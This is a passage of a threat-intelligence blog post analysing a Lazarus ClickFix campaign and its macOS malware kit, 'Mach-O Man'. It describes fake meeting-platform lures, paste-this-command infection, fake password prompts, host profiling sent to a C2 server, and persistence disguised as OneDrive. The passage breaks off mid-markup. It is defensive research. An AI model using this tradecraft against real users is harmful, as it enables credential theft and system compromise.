{"id":20176,"date":"2026-04-21T08:49:42","date_gmt":"2026-04-21T08:49:42","guid":{"rendered":"https:\/\/any.run\/cybersecurity-blog\/?p=20176"},"modified":"2026-04-21T11:02:52","modified_gmt":"2026-04-21T11:02:52","slug":"lazarus-macos-malware-mach-o-man","status":"publish","type":"post","link":"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/","title":{"rendered":"New Lazarus APT Campaign: \u201cMach-O Man\u201d macOS Malware\u00a0Kit Hits Businesses"},"content":{"rendered":"\n<p><em><strong>Editor\u2019s note:<\/strong><\/em><strong><em>&nbsp;The research is authored by Mauro Eldritch, offensive security expert and a founder of BCA LTD, a company dedicated to threat intelligence and hunting. You can&nbsp;<\/em><a href=\"https:\/\/x.com\/MauroEldritch\" target=\"_blank\" rel=\"noreferrer noopener\"><em>find Mauro on X<\/em><\/a><em>.<\/em>&nbsp;<\/strong><\/p>\n\n\n\n<p>The recent wave of&nbsp;<a href=\"https:\/\/any.run\/cybersecurity-blog\/click-fix-attacks-eric-parker-analysis\/\" target=\"_blank\" rel=\"noreferrer noopener\">ClickFix attacks<\/a>&nbsp;has introduced several new ways to compromise users,&nbsp;establishing&nbsp;itself as a technique that is likely here to stay. 
We have&nbsp;observed&nbsp;Lazarus Group using this method to distribute a range of malware, from well-known families to more unusual variants such as&nbsp;<a href=\"https:\/\/any.run\/cybersecurity-blog\/lazarus-group-it-workers-investigation\/\" target=\"_blank\" rel=\"noreferrer noopener\">PyLangGhostRAT<\/a>, a Python-based vibe-coded port of the original Go version, along with other oddities.&nbsp;<\/p>\n\n\n\n<p>In this article, we analyze the next stage of this campaign: a newly identified macOS malware kit that is currently being actively distributed.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Executive Summary<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>What\u2019s\u00a0happening:<\/strong>\u00a0<a href=\"https:\/\/any.run\/cybersecurity-blog\/enterprise-cybersecurity-risks-2026\/\" target=\"_blank\" rel=\"noreferrer noopener\">Lazarus Group<\/a> is running an active campaign using fake meetings to gain access to corporate systems, credentials, and sensitive data.\u00a0<\/li>\n\n\n\n<li><strong>Who is at risk:<\/strong>\u00a0Fintech, crypto, and high-value environments where <a href=\"https:\/\/any.run\/cybersecurity-blog\/anyrun-macos-sandbox\/\" target=\"_blank\" rel=\"noreferrer noopener\">macOS<\/a> is widely used by developers, executives, and decision-makers.\u00a0<\/li>\n\n\n\n<li><strong>How access is gained:<\/strong>\u00a0Users execute commands themselves, allowing attackers to bypass traditional controls and\u00a0operate\u00a0without immediate detection.\u00a0<\/li>\n\n\n\n<li><strong>What attackers are after:<\/strong>\u00a0Credentials, browser sessions, and macOS Keychain data that provide direct access to infrastructure and financial assets.\u00a0<\/li>\n\n\n\n<li><strong>Why this is hard to detect:<\/strong>\u00a0The attack relies on social engineering and native macOS binaries, reducing visibility for traditional EDR tools.\u00a0<\/li>\n\n\n\n<li><strong>How data is exfiltrated:<\/strong>\u00a0Telegram is used as a trusted 
channel to move sensitive data outside the organization.\u00a0<\/li>\n\n\n\n<li><strong>What this leads to:<\/strong>\u00a0Account takeover, unauthorized infrastructure access,\u00a0financial loss, and exposure of critical data.\u00a0<\/li>\n\n\n\n<li><strong>What this means for CISOs:<\/strong>\u00a0A single compromised macOS device can result in full access to internal systems, production environments, or crypto assets.\u00a0<\/li>\n\n\n\n<li><strong>How SOCs should respond:<\/strong> Identify credential exposure early by introducing <a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN\u2019s cross-platform analysis capabilities<\/a> during triage, which offer a 36% higher detection rate.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">New&nbsp;Lazarus&nbsp;ClickFix&nbsp;macOS&nbsp;Campaign:&nbsp;Why Companies Are at Risk&nbsp;<\/h2>\n\n\n\n<p>Lazarus Group is actively&nbsp;<a href=\"https:\/\/quetzal.bitso.com\/p\/north-koreas-safari-hunting-for-rats?triedRedirect=true\" target=\"_blank\" rel=\"noreferrer noopener\">running a campaign<\/a>&nbsp;that turns routine business communication into a direct path to credential theft and data loss.&nbsp;<\/p>\n\n\n\n<p>The attack targets&nbsp;business leaders&nbsp;through Telegram, often using compromised accounts of colleagues or contacts. Victims receive what&nbsp;appears to be&nbsp;a legitimate meeting invitation and are redirected to a fake collaboration platform that mimics Zoom, Microsoft Teams, or&nbsp;<a href=\"https:\/\/any.run\/cybersecurity-blog\/enterprise-phishing-analysis\/\" target=\"_blank\" rel=\"noreferrer noopener\">Google<\/a>&nbsp;Meet. 
The scenario is familiar and urgent, which lowers suspicion and increases the likelihood of interaction.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"589\" height=\"861\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861.jpg\" alt=\"\" class=\"wp-image-20179\" style=\"width:417px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861.jpg 589w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861-205x300.jpg 205w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861-370x541.jpg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861-270x395.jpg 270w\" sizes=\"(max-width: 589px) 100vw, 589px\" \/><figcaption class=\"wp-element-caption\"><em>Messages sent by Lazarus operatives. Credit:&nbsp;Bitso&nbsp;Quetzal Team<\/em>&nbsp;<br><\/figcaption><\/figure><\/div>\n\n\n<p>Instead of exploiting a technical vulnerability, the attackers rely on&nbsp;a simple instruction. The user is prompted to \u201cfix\u201d a connection issue by copying and executing a command. This step shifts control to the attacker without triggering many traditional security&nbsp;controls, because&nbsp;the action is performed by the user themselves.&nbsp;<\/p>\n\n\n\n<p>From that moment, the operation is focused on extracting business value as quickly as possible. The attacker collects credentials, browser sessions, and system-stored secrets, including macOS Keychain data. 
These assets provide immediate access to corporate systems, SaaS platforms, and financial resources.&nbsp;<\/p>\n\n\n\n<p>Telegram is used again as an exfiltration channel, allowing stolen data to be transferred through a legitimate service that blends into normal traffic.&nbsp;<\/p>\n\n\n\n<p>By the time the activity is recognized as malicious, credentials may already be&nbsp;compromised&nbsp;and sensitive data already exfiltrated. At that point, the organization is dealing with:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Unauthorized access to business systems and accounts<\/li>\n<li>Financial loss through fraudulent transactions or misuse of access<\/li>\n<li>Exposure of sensitive data leading to regulatory and reputational impact<\/li>\n<\/ul>\n\n\n\n<p>At the core of this operation is a newly identified macOS malware kit, \u201cMach-O Man\u201d,&nbsp;discovered by the Quetzal Team. Built as a set of Go-based Mach-O binaries, it reflects a shift toward native macOS threats. 
The following sections break down how this kit&nbsp;operates&nbsp;across each stage of the attack chain.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Technical Analysis of the Mach-O Man Kit&nbsp;<\/h2>\n\n\n\n<h2 class=\"wp-block-heading\">The Stager&nbsp;<\/h2>\n\n\n\n<p>As described earlier,&nbsp;in&nbsp;this&nbsp;ClickFix&nbsp;campaign, the victim is invited to a meeting via Telegram, typically by a compromised contact sharing a&nbsp;link.&nbsp;&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"527\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-3-1024x527.png\" alt=\"\" class=\"wp-image-20182\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-3-1024x527.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-3-300x154.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-3-768x395.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-3-1536x790.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-3-2048x1054.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-3-370x190.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-3-270x139.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-3-585x300.png 585w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-3-740x381.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>The full malware kit with all its components and variants<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>When the user visits it, they are taken to a site impersonating a legitimate meeting platform such as Zoom, Meet, or Teams. 
The page then displays a fake error message claiming that, to resolve the issue, the user must copy and paste a command into their terminal.&nbsp;<\/p>\n\n\n\n<p>Thanks to&nbsp;<a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN\u2019s Interactive Sandbox<\/a>,&nbsp;we&nbsp;can safely&nbsp;execute this command and&nbsp;observe&nbsp;the malicious behavior inside a&nbsp;secure macOS VM,&nbsp;without risk to our systems.&nbsp;&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/937afde2-5e3c-4eb0-a7d1-6124f0f3ed18\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">See live sandbox analysis of fake Mach-O Man kit apps<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"641\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-2-1-1024x641.png\" alt=\"\" class=\"wp-image-20262\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-2-1-1024x641.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-2-1-300x188.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-2-1-768x480.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-2-1-1536x961.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-2-1-370x231.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-2-1-270x169.png 270w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-2-1-740x463.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-2-1.png 1944w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Fake&nbsp;Mach-O Man Kit apps shown inside ANY.RUN\u2019s sandbox<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Trusted by <a href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktoenterprise\" target=\"_blank\" rel=\"noreferrer noopener\">15,000 organizations worldwide<\/a>, including 74 Fortune 100 companies, ANY.RUN accelerates triage &amp; response by enabling SOC teams to analyze URLs and files within a&nbsp;private, real-time virtual&nbsp;environment, reproducing the full attack flow across Windows, macOS, Linux, and Android.&nbsp;&nbsp;<\/p>\n\n\n\n<p>The result is faster, more&nbsp;consistent&nbsp;decisions across the SOC, with earlier identification of threats, reduced response time, and lower risk of incidents escalating into financial and operational impact.&nbsp;<\/p>\n\n\n\n<p>Pasting and running the command in the terminal leads to&nbsp;the installation of malware. 
In this case, it executes&nbsp;teamsSDK.bin, the stager and initial&nbsp;component&nbsp;of the Mach-O Man kit.&nbsp;<\/p>\n\n\n\n<p>When executed in our laboratory, we&nbsp;observed&nbsp;an interesting behavior: when run without arguments, the binary displays a usage message&nbsp;indicating&nbsp;how to activate it and revealing support for impersonating Google, Zoom, Teams, and \u201cSystem\u201d.&nbsp;<\/p>\n\n\n\n<p>Fun fact: if you try to choose Google, it politely&nbsp;states&nbsp;that it is \u201cnot yet implemented\u201d.&nbsp;A surprisingly polished touch.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"706\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image4-2-1024x706.png\" alt=\"\" class=\"wp-image-20187\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image4-2-1024x706.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image4-2-300x207.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image4-2-768x530.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image4-2-1536x1059.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image4-2-2048x1412.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image4-2-370x255.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image4-2-270x186.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image4-2-435x300.png 435w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image4-2-740x510.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Stager&nbsp;teamsSDK.bin&nbsp;usage<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>When invoked correctly, it downloads a fake macOS Application 
impersonating one of the previously mentioned platforms, with \u201cSystem\u201d referring to generic macOS system prompts presented to the user. To ensure execution, the malware uses macOS\u2019 codesign utility to apply an ad-hoc signature to the application bundle, making it appear properly signed to the system.&nbsp;<\/p>\n\n\n\n<p>All applications are&nbsp;virtually identical, differing only in minimal visual cues. They prompt the user for their password in broken English three times in a row.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"706\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image5-1-1024x706.png\" alt=\"\" class=\"wp-image-20190\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image5-1-1024x706.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image5-1-300x207.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image5-1-768x530.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image5-1-1536x1059.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image5-1-2048x1412.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image5-1-370x255.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image5-1-270x186.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image5-1-435x300.png 435w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image5-1-740x510.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Fake Teams App prompts for user credentials<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>The first two attempts always shake the window,&nbsp;indicating&nbsp;that the password is incorrect (even if not), while 
the third one disappears as if the authentication had succeeded.&nbsp;<\/p>\n\n\n\n<p>Regardless of which platform is being impersonated, at the end they all display Zoom\u2019s logo along with a message&nbsp;stating&nbsp;that the installation was successful.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"612\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image6-1-1024x612.png\" alt=\"\" class=\"wp-image-20192\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image6-1-1024x612.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image6-1-300x179.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image6-1-768x459.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image6-1-1536x918.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image6-1-2048x1224.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image6-1-370x221.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image6-1-270x161.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image6-1-740x442.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Zoom logo displayed on the fake Teams App&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Running them interactively from the shell reveals errors during execution. 
Many interesting failures will be discussed throughout the analysis of the remaining components, suggesting that exhaustive testing was not conducted.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"604\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/E-1-1024x604.png\" alt=\"\" class=\"wp-image-20207\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/E-1-1024x604.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/E-1-300x177.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/E-1-768x453.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/E-1-1536x906.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/E-1-2048x1207.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/E-1-370x218.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/E-1-270x159.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/E-1-740x436.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Most modules present faulty functions or unexpected errors<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>In the background, the next stage is downloaded, typically named in the format D1{??????}.bin. Some examples we were able to retrieve include D1YrHRTg.bin, D1yCPUyk.bin, and D1ozPVNG.bin. 
At the same time, the malware performs basic fingerprinting via&nbsp;sysctl&nbsp;queries, collecting information such as CPU details and system boot time.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/F-1024x576.png\" alt=\"\" class=\"wp-image-20210\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/F-1024x576.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/F-300x169.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/F-768x432.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/F-1536x865.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/F-2048x1153.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/F-370x208.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/F-270x152.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/F-740x417.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Basic host fingerprinting<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Let\u2019s&nbsp;check the next stage.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">The Profiler&nbsp;<\/h2>\n\n\n\n<p>This second binary, D1YrHRTg.bin (or any other variant you are able to retrieve), acts as a system profiler.&nbsp;It registers the host with the C2 and sends a system profile.&nbsp;<\/p>\n\n\n\n<p>The first notable behavior is that, when executed without arguments, it once again displays a usage message, a&nbsp;rather kind&nbsp;gesture.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"706\" 
src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image9-2-1024x706.png\" alt=\"\" class=\"wp-image-20195\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image9-2-1024x706.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image9-2-300x207.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image9-2-768x530.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image9-2-1536x1059.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image9-2-2048x1412.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image9-2-370x255.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image9-2-270x186.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image9-2-435x300.png 435w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image9-2-740x510.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Most modules&nbsp;contain&nbsp;a usage message<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>This module relies on&nbsp;sysctl&nbsp;and local userland tools to build a comprehensive profile of the host, including hostname, a unique identifier, CPU type, boot time, operating system details, network configuration, running processes, and a list of browser extensions, with dedicated targeting of Brave, Vivaldi, Opera, Chrome, Firefox, and Safari.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\n<span class=\"highlight\">Speed up triage &#038; response workflows in your SOC. 
<\/span><br>Validate alerts and analyze artifacts with ANY.RUN.&nbsp;   \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"http:\/\/app.any.run\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=lazarus-apt-macos-campaign&#038;utm_term=210426&#038;utm_content=linktoregistration#register\/\" rel=\"noopener\" target=\"_blank\">\nSign up\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<p>This information is written to a text file and sent to the C2 server.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"702\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/H-1-1024x702.png\" alt=\"\" class=\"wp-image-20253\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/H-1-1024x702.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/H-1-300x206.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/H-1-768x527.png 768w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/H-1-1536x1054.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/H-1-2048x1405.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/H-1-370x254.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/H-1-270x185.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/H-1-740x508.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>The TXT file broadcasted to the C2 Server<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>As previously noted, some of these modules are faulty.&nbsp;&nbsp;<\/p>\n\n\n\n<p>This one, in particular, exhibits&nbsp;a self-sabotaging behavior, occasionally entering an endless loop that repeatedly posts the system profile text file to the C2 server, exhausting system resources and making its presence&nbsp;quite obvious&nbsp;to the victim.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"653\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/I-1-1024x653.png\" alt=\"\" class=\"wp-image-20216\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/I-1-1024x653.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/I-1-300x191.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/I-1-768x489.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/I-1-1536x979.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/I-1-2048x1305.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/I-1-370x236.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/I-1-270x172.png 270w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/I-1-740x472.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Repeated curl commands posting the same file<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Next, a new binary called minst2.bin is retrieved from the \/payload C2 endpoint, marking the beginning of the persistence stage.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">The Persistence Mechanism&nbsp;<\/h2>\n\n\n\n<p>minst2.bin was slightly trickier to debug, as it does not come bundled with a usage helper, so I had to manually fine-tune both the number and type of arguments&nbsp;required. After reverse engineering how the previous stage invokes it, I found that it takes the machine UUID, a payload URL, and a filename as arguments, and proceeds to download a remote file named&nbsp;localencode, saving it locally as OneDrive and setting it up to run as a startup item.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"604\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/J-1-1024x604.png\" alt=\"\" class=\"wp-image-20219\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/J-1-1024x604.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/J-1-300x177.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/J-1-768x453.png 768w, 